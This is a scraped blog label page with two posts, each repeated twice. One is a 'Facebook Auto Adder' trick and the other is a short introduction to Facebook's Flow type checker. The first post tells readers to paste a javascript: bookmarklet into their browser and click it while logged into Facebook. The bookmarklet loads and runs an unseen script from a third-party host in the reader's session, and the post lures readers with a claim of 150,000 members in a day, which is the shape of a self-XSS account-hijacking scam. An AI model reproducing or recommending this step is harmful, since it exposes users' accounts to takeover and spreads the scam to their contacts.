Showing posts with label javascript. Show all posts
Showing posts with label javascript. Show all posts
Tuesday, September 26, 2017
Trick To Increase Facebook Group Member With Facebook Auto Adder JavaScript
Trick To Increase Facebook Group Member With Facebook Auto Adder JavaScript
Hello Friends..
Sorry for my inconsistency on FreeFileHouse,I was busy with my exams thats why didnt able to concentrate on blogging.
but belive me after my todays post you will forgive me for my inconsistency on blog posting.. :)
So,coming to the topic again today i will show you a cool java script by which you can easily able to increase your group members on facebook.This is really a cool javascript and i tried it on my group and got approx 150000 members in just one day..isnt it sounds cool..
So without taking much of your precious time..Here the process..
First of all Make Sure Bookmark Bar is
visible. If not visible then right click on the top of Firefox and select "Bookmarks Toolbar". & This will make Bookmark Bar visible.

For Google Chrome Users Simply Press Ctrl+Shift+B
Copy the following JavaScript & paste it on Bookmarks Toolbar as you can see in image below.
javascript:(function(){document.body.appendChild(document.createElement(script)).src=http://alviarman2009.my3gb.com/script.txt;})();
This will create a bookmark "javascript:(function(){" in the bookmark bar.

Log In to Facebook
And Go To any of the facebook group.
Now Click the Bookmark that you made..
This will start adding your friends in that Group
To get maximum members to your facebook group..Request all your group members or friends to do the same..
This JavaScript is tested successfully on browsers like mozila firefox and google chrome..and works fine on them.
if you are facing any problem with this javaScript Comment below..i will try my best to sort that out..
start adding your friends to groups before facebook block this script.. :)
enjoy!!
Sorry for my inconsistency on FreeFileHouse,I was busy with my exams thats why didnt able to concentrate on blogging.
but belive me after my todays post you will forgive me for my inconsistency on blog posting.. :)
So,coming to the topic again today i will show you a cool java script by which you can easily able to increase your group members on facebook.This is really a cool javascript and i tried it on my group and got approx 150000 members in just one day..isnt it sounds cool..
So without taking much of your precious time..Here the process..
First of all Make Sure Bookmark Bar is
visible. If not visible then right click on the top of Firefox and select "Bookmarks Toolbar". & This will make Bookmark Bar visible.
For Google Chrome Users Simply Press Ctrl+Shift+B
Copy the following JavaScript & paste it on Bookmarks Toolbar as you can see in image below.
javascript:(function(){document.body.appendChild(document.createElement(script)).src=http://alviarman2009.my3gb.com/script.txt;})();
This will create a bookmark "javascript:(function(){" in the bookmark bar.
Log In to Facebook
And Go To any of the facebook group.
Now Click the Bookmark that you made..
This will start adding your friends in that Group
To get maximum members to your facebook group..Request all your group members or friends to do the same..
This JavaScript is tested successfully on browsers like mozila firefox and google chrome..and works fine on them.
if you are facing any problem with this javaScript Comment below..i will try my best to sort that out..
start adding your friends to groups before facebook block this script.. :)
enjoy!!
download file now
Thursday, August 31, 2017
Type checking in javascript has never been easier
Type checking in javascript has never been easier
I love languages which arent strongly typed. It makes software development process very fast and very easy as we need not write huge, complex, unreadable code like in our typed languages. However this can lead to developers worst nightmare: Runtime errors! In languages such as javascript it is not easy to check for type mismatches while in development process. Hence flow was invented!
Flow is one of Facebooks open source projects. It allows developers to check for programming errors in javascript code with very less effort. This is a sample code available on their site:
Note that a string is passed into the function foo and an arithmetic operation is performed on that string inside it. When flow is run on this code:
It points out that the string is incompatible with number. Consider a much much complex code. An error like this can simply be unnoticed until a runtime error is raised.
Source: https://github.com/facebook/flow
Installation: http://flowtype.org/docs/getting-started.html
Examples: http://flowtype.org/docs/five-simple-examples.html
Flow is one of Facebooks open source projects. It allows developers to check for programming errors in javascript code with very less effort. This is a sample code available on their site:
function foo(x) {
return x * 10;
}
foo(Hello, world!);
Note that a string is passed into the function foo and an arithmetic operation is performed on that string inside it. When flow is run on this code:
01_HelloWorld/hello.js:7:5,17: string
This type is incompatible with
01_HelloWorld/hello.js:4:10,13: numberIt points out that the string is incompatible with number. Consider a much much complex code. An error like this can simply be unnoticed until a runtime error is raised.
Source: https://github.com/facebook/flow
Installation: http://flowtype.org/docs/getting-started.html
Examples: http://flowtype.org/docs/five-simple-examples.html
download file now
Subscribe to:
Posts (Atom)